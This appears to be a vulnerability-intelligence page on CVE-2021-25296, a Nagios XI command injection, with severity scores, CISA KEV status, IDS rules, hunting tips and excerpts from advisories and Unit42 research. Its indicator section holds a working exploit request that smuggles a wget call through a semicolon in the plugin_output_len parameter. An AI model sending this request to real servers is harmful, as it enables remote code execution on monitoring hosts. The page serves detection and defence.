CVE-2021-25296
published 2021-02-15CVE-2021-25296: Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file…
PriorityP192high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-02-01
Exploited in the wild
EPSS
71.74%
99.3th percentile
Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nagios | nagios_xi | 5.5.6 – 5.7.5 | — |
Detection & IOCsextracted from sources · hover to see the quote
url/nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3bwget%20{{interactsh-url}}%3b
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25296)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"nagiosxi/config/monitoringwizard.php?"; fast_pattern; content:"plugin_output_len="; pcre:"/^[0-9]{1,10}\x3b/R"; reference:cve,2021-25296; classtype:attempted-admin; sid:2034992; rev:1; metadata:attack_target Server, created_at 2022_01_27, cve CVE_2021_25296, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_01_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)- →Exploit targets GET /nagiosxi/config/monitoringwizard.php with wizard=windowswmi and a semicolon-injected plugin_output_len parameter (e.g., plugin_output_len=9999;<command>). Monitor for numeric value followed immediately by %3b or literal semicolon in that parameter.
- →Hunt for running processes matching systemd-py-run.sh, systemd-run.py, systemd-udevd-run.sh, systemd-udevd.sh, workrun.sh, or systemd-dev as indicators of XMRig deployment post-exploitation. ↗
- →Check for presence of dropper/persistence scripts in /usr/lib/dev and /tmp/usr/lib as post-exploitation artifacts. ↗
- →Palo Alto Threat Prevention signature 90873 covers this exploit; use as a reference SID for tuning equivalent IDS/IPS rules. ↗
- →Emergingthreats Snort/Suricata SID 2034992 directly detects CVE-2021-25296 exploitation attempts against nagiosxi/config/monitoringwizard.php with a semicolon-injected plugin_output_len value.
- ·Exploitation requires valid Nagios XI credentials; this is an authenticated RCE, not unauthenticated. Detection rules should account for the authenticated session flow (login → obtain nsp token → exploit request). ↗
- ·The vulnerable backend file /html/config/monitoringwizard.php is encrypted with SG11; analysis must be performed on the include file windowswmi.inc.php instead. ↗
- ·The same Metasploit module also covers CVE-2021-25297 (switch wizard) and CVE-2021-25298 (cloud-vm wizard); detections scoped only to windowswmi will miss those related exploitation paths. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck8.8HIGH
cisa8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-8hgr-54hv-7pgc: Nagios XI version xi-5
ghsa_unreviewed·2022-05-24
CVE-2021-25296 [HIGH] CWE-78 GHSA-8hgr-54hv-7pgc: Nagios XI version xi-5
Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.
VulnCheck
Nagios XI OS Command Injection
vulncheck·2021·CVSS 8.8
CVE-2021-25296 [HIGH] CWE-78 Nagios XI OS Command Injection
Nagios XI OS Command Injection
Nagios XI contains a vulnerability which can lead to OS command injection on the Nagios XI server.
Affected: Nagios Nagios XI
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/network-attack-trends-february-april-2021/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/
Remediation Due: 2022-02-01
CISA
Nagios XI OS Command Injection
cisa·2022-01-18·CVSS 8.8
CVE-2021-25296 [HIGH] CWE-78 Nagios XI OS Command Injection
Vulnerability: Nagios XI OS Command Injection
Affected: Nagios Nagios XI
Nagios XI contains a vulnerability which can lead to OS command injection on the Nagios XI server.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2021-25296
Remediation Due Date: 2022-02-01
Suricata
ET WEB_SPECIFIC_APPS [Perch Security] Nagios XI Web SSH Terminal sshterm Cross-Site Scripting (CVE-2021-25299)
suricata·2025-01-09·CVSS 6.1
CVE-2021-25299 [MEDIUM] ET WEB_SPECIFIC_APPS [Perch Security] Nagios XI Web SSH Terminal sshterm Cross-Site Scripting (CVE-2021-25299)
ET WEB_SPECIFIC_APPS [Perch Security] Nagios XI Web SSH Terminal sshterm Cross-Site Scripting (CVE-2021-25299)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS [Perch Security] Nagios XI Web SSH Terminal sshterm Cross-Site Scripting (CVE-2021-25299)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/nagiosxi/admin/sshterm.php?"; startswith; fast_pattern; content:"url="; nocase; pcre:"/^.+(script|onerror|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D)/Ri"; reference:url,www.connectwise.com/resources/cve-spotlight-nagios-xi-cve-2021-25296-25297-25298-25299; reference:cve,2021-25299; classtype:web-application-attack; sid:2059094; rev:2; metadata:affected_product
Suricata
ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25296)
suricata·2022-01-27·CVSS 8.8
CVE-2021-25296 [HIGH] ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25296)
ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25296)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25296)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"nagiosxi/config/monitoringwizard.php?"; fast_pattern; content:"plugin_output_len="; pcre:"/^[0-9]{1,10}\x3b/R"; reference:cve,2021-25296; classtype:attempted-admin; sid:2034992; rev:1; metadata:attack_target Server, created_at 2022_01_27, cve CVE_2021_25296, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_01_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)
suricata·2022-01-27·CVSS 8.8
CVE-2021-25296 [HIGH] ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)
ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"nagiosxi/config/monitoringwizard.php?"; fast_pattern; content:"ip_address="; content:"|3b|"; within:30; reference:cve,2021-25296; reference:cve,2021-25297; classtype:attempted-admin; sid:2034993; rev:1; metadata:attack_target Server, created_at 2022_01_27, cve CVE_2021_25296_CVE_2021_25297, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_01_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id
Nuclei
Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection
nuclei·CVSS 8.8
CVE-2021-25296 [HIGH] Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection
Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection
Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
id: CVE-2021-25296
info:
name: Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection
author: k0pak4
severity: high
description: |
Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injectio
Metasploit
Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection
metasploit·CVSS 8.8
CVE-2021-25296 [HIGH] Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection
Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection
This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm configuration wizards that allow an authenticated user to perform remote code execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user. Valid credentials for a Nagios XI user are required. This module has been successfully tested against official NagiosXI OVAs from 5.5.6-5.7.5.
Unit42
IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
blogs_unit42·2023-06-22·CVSS 9.8
CVE-2019-12725 [CRITICAL] IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
## Executive Summary
Since March 2023, Unit 42 researchers have observed threat actors leveraging several IoT vulnerabilities to spread a variant of the Mirai botnet. The vulnerabilities exploited include those listed in the following table:
CVE/Product
Description
CVE-2019-12725
Zeroshell Remote Command Execution Vulnerability
CVE-2019-17621
D-Link DIR-859 Remote Command Injection Vulnerability
CVE-2019-20500
D-Link DWL-2600AP Remote Command Execution Vulnerability
CVE-2021-25296
Nagios XI Remote Command Injection Vulnerability
CVE-2021-46422
Telesquare SDT-CW3B1 Router Command Injection Vulnerability
CVE-2022-27002
Arris TR3300 Remote Command Injection Vulnerability
CVE-2022-29303
SolarView Compact Command Injection Vulnerability
CVE-2022-30023
Tenda HG9 Router Command Injectio
Unit42
IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
blogs_unit42·2023-06-22·CVSS 9.8
CVE-2019-12725 [CRITICAL] IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
Threat Research Center
Trend Reports
Vulnerabilities
## IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
Chao Lei
Zhibin Zhang
Yiheng An
Cecilia Hu
Published: June 22, 2023
Trend Reports
Vulnerabilities
Botnet
CVE-2019-12725
CVE-2019-17621
CVE-2019-20500
CVE-2021-25296
CVE-2021-46422
CVE-2022-27002
CVE-2022-29303
CVE-2022-30023
CVE-2022-30525
CVE-2022-31499
CVE-2022-36266
CVE-2022-40005
CVE-2022-45699
CVE-2023-1389
CVE-2023-25280
CVE-2023-27240
IoT
IoT Security
Mirai
## Executive Summary
Since March 2023, Unit 42 researchers have observed threat actors leveraging several IoT vulnerabilities to spread a variant of the Mirai botnet. The vulnerabilities exploited include those listed in the following table:
CVE/Pro
Unit42
Network Attack Trends: February-April 2021
blogs_unit42·2021-07-01
Network Attack Trends: February-April 2021
## Executive Summary
Unit 42 researchers observed network attack trends, February-April 2021. In the following sections, we present our analysis of the most recently published vulnerabilities, including the severity and category. Additionally, we provide insight into how the vulnerabilities are actively exploited in the wild based on real-world data collected from Palo Alto Networks Next-Generation Firewalls. We then draw conclusions about the most commonly exploited vulnerabilities the attackers are using, as well as the severity, category and origin of each attack.
## Network Attack Trends February-April 2021: Analysis of the Latest Published Vulnerabilities
From February-April 2021, a total of 4,969 new Common Vulnerabilities and Exposures (CVE) numbers were registered. To better und
Unit42
Network Attack Trends: February-April 2021
blogs_unit42·2021-07-01
Network Attack Trends: February-April 2021
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: February-April 2021
Yue Guan
Lei Xu
Vaibhav Singhal
Brock Mammen
Published: July 1, 2021
Trend Reports
Vulnerabilities
Network security trends
## Executive Summary
Unit 42 researchers observed network attack trends, February-April 2021. In the following sections, we present our analysis of the most recently published vulnerabilities, including the severity and category. Additionally, we provide insight into how the vulnerabilities are actively exploited in the wild based on real-world data collected from Palo Alto Networks Next-Generation Firewalls . We then draw conclusions about the most commonly exploited vulnerabilities the attackers are using, as well as the severity, category and origin of
Unit42
Are Your Nagios XI Servers Turning Into Cryptocurrency Miners for Attackers?
blogs_unit42·2021-04-15·CVSS 8.8
CVE-2021-25296 [HIGH] Are Your Nagios XI Servers Turning Into Cryptocurrency Miners for Attackers?
## Executive Summary
On March 16, 2021, Unit 42 researchers observed an attacker targeting Nagios XI software to exploit the vulnerability CVE-2021-25296, a remote command injection vulnerability impacting Nagios XI version 5.7.5, to conduct a cryptojacking attack and deploy the XMRig coinminer on victims’ devices. At the time of writing, the attack is still ongoing.
Nagios XI is a widely-used software that provides enterprise server and network monitoring solutions. The feature in Nagios XI that is under exploitation is “Configuration Wizard: Windows Management Instrumentation (WMI)”.
XMRig coin miner is an open-source cross-platform cryptocurrency miner. A successful attack will deploy an XMRig coinminer on the compromised devices.
Upgrading Nagios XI to the latest version mitigates
Unit42
Are Your Nagios XI Servers Turning Into Cryptocurrency Miners for Attackers?
blogs_unit42·2021-04-15·CVSS 8.8
CVE-2021-25296 [HIGH] Are Your Nagios XI Servers Turning Into Cryptocurrency Miners for Attackers?
Threat Research Center
Threat Research
Vulnerabilities
## Are Your Nagios XI Servers Turning Into Cryptocurrency Miners for Attackers?
Haozhe Zhang
Vaibhav Singhal
Zhibin Zhang
Qi Deng
Published: April 15, 2021
Threat Research
Vulnerabilities
Command injection
Cryptocurrency mining
Cryptojacking
CVE-2021-25296
Nagios
XMRig
## Executive Summary
On March 16, 2021, Unit 42 researchers observed an attacker targeting Nagios XI software to exploit the vulnerability CVE-2021-25296 , a remote command injection vulnerability impacting Nagios XI version 5.7.5, to conduct a cryptojacking attack and deploy the XMRig coinminer on victims’ devices. At the time of writing, the attack is still ongoing.
Nagios XI is a widely-used software that provides enterprise server and network m
http://nagios.comhttp://packetstormsecurity.com/files/161561/Nagios-XI-5.7.5-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/170924/Nagios-XI-5.7.5-Remote-Code-Execution.htmlhttps://assets.nagios.com/downloads/nagiosxi/versions.phphttps://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.mdhttps://www.fastly.com/blog/anatomy-of-a-command-injection-cve-2021-25296-7-8-with-metasploit-module-andhttp://nagios.comhttp://packetstormsecurity.com/files/161561/Nagios-XI-5.7.5-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/170924/Nagios-XI-5.7.5-Remote-Code-Execution.htmlhttps://assets.nagios.com/downloads/nagiosxi/versions.phphttps://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.mdhttps://www.fastly.com/blog/anatomy-of-a-command-injection-cve-2021-25296-7-8-with-metasploit-module-andhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-25296
2021-02-15
Published
2022-01-18
Added to CISA KEV
Exploited in the wild